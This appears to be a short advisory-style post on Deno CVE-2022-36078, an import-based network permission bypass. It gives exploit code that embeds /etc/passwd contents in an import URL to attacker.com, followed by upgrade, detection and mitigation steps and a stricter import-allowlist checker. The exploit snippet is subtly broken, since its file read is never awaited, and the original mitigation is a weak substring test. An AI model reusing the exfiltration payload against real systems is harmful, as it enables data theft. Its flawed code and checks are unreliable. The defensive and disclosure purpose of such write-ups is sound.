How the CVE Works
CVE-2022-36078 stems from Deno's failure to enforce network permission checks on static imports. Attackers leverage this flaw to exfiltrate sensitive files (e.g., /etc/passwd) via crafted imports. When a Deno script runs with `--allow-read` and `--allow-write`, malicious code can inject a static import pointing to an attacker-controlled domain. Resolving that import triggers an HTTP request containing the stolen data, bypassing the `--allow-net` restriction. The attack requires two executions: the first modifies the script to add the malicious import, and the second exfiltrates the data.
DailyCVE Form
Platform: Deno
Version: <1.25.2
Vulnerability: Import Bypass
Severity: Critical
Date: 2022-08-18
Prediction: Patched by 2022-08-25
What Undercode Say:
Exploitation
1. Payload Injection:
const payload = `import "https://attacker.com/steal?data=${encodeURIComponent(Deno.readTextFile("/etc/passwd"))}"`;
await Deno.writeTextFile("malicious.js", payload);
2. Trigger Exfiltration:
deno run --allow-read --allow-write malicious.js
Protection
1. Update Deno:
deno upgrade --version 1.25.2
2. Restrict Permissions:
deno run --no-remote vulnerable.js
3. Static Analysis:
grep -r "import.*http" /path/to/code
Detection
1. Network Monitoring:
tcpdump -i eth0 'host attacker.com'
2. Deno Audit:
deno audit
Mitigation Code
// Validate imports before execution
const ALLOWED_DOMAINS = ["trusted.com"];
const file = await Deno.readTextFile("script.ts");
if (file.includes("import") && !ALLOWED_DOMAINS.some(d => file.includes(d))) {
  throw new Error("Malicious import detected");
}
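A stricter form of the check above, as an added example that is not code from Deno or from the original post: it parses each import specifier and compares the hostname exactly, because a substring test on the whole file accepts any file that merely mentions an allowed domain. The helper names, the sample module text and the hosts attacker.example and cdn.example are constructed for illustration.

```javascript
// Added example; helper names and sample hosts are constructed for illustration.
const ALLOWED_HOSTS = new Set(["trusted.com"]);

// Captures the specifier of `import ... from "x"`, `export ... from "x"`,
// bare `import "x"`, and `import("x")` with a string-literal argument.
const IMPORT_RE =
  /\b(?:import|export)\b[^"'`;]*?\bfrom\s*["']([^"']+)["']|\bimport\s*\(?\s*["']([^"']+)["']/g;

// Returns every remote (http/https) import whose parsed hostname is not allowlisted.
function findDisallowedImports(source, allowedHosts = ALLOWED_HOSTS) {
  const findings = [];
  for (const m of source.matchAll(IMPORT_RE)) {
    const specifier = m[1] ?? m[2];
    let url;
    try {
      url = new URL(specifier); // throws for relative paths and bare specifiers
    } catch {
      continue; // local module, no network fetch
    }
    if (url.protocol !== "http:" && url.protocol !== "https:") continue;
    // Exact match on the parsed hostname, never a substring match on the file text.
    if (!allowedHosts.has(url.hostname)) {
      findings.push({ specifier, host: url.hostname });
    }
  }
  return findings;
}

// The substring check from the section above, for comparison.
function substringCheckRejects(source, domains = ["trusted.com"]) {
  return source.includes("import") && !domains.some((d) => source.includes(d));
}

// Constructed sample module text.
const SAMPLE = [
  'import { serve } from "https://trusted.com/std/http/server.ts";',
  'import "https://attacker.example/steal?data=abc";',
  'import x from "https://attacker.example/trusted.com/mod.ts";',
  'export * from "https://trusted.com.attacker.example/mod.ts";',
  'import { util } from "./local.ts";',
  'const m = await import("https://cdn.example/x.js");',
].join("\n");

console.log(findDisallowedImports(SAMPLE).map((f) => f.host));
console.log("substring check rejects sample:", substringCheckRejects(SAMPLE));
```

The regex is a text-level approximation and will miss specifiers built at runtime, so treat it as a pre-execution gate alongside the upgrade, not a replacement for it.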
References
- Deno Security Advisory
- CVE-2022-36078
Sources:
Reported By: github.com
Extra Source Hub:
Undercode